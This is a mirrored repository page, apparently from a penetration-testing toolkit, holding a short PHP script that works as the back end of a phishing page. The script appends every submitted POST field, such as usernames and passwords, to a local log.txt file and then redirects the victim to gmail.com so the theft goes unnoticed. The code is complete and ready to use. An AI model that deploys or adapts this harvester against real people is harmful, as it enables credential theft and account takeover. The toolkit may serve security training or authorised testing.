mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-27 19:16:08 -04:00
14 lines
282 B
PHP
14 lines
282 B
PHP
<?php
|
|
header ('Location:http://www.gmail.com');
|
|
$handle = fopen("log.txt", "a");
|
|
foreach($_POST as $variable => $value) {
|
|
fwrite($handle, $variable);
|
|
fwrite($handle, "=");
|
|
fwrite($handle, $value);
|
|
fwrite($handle, "\r\n"); }
|
|
fwrite($handle,"\r\n");
|
|
fclose($handle);
|
|
exit;
|
|
?>
|
|
|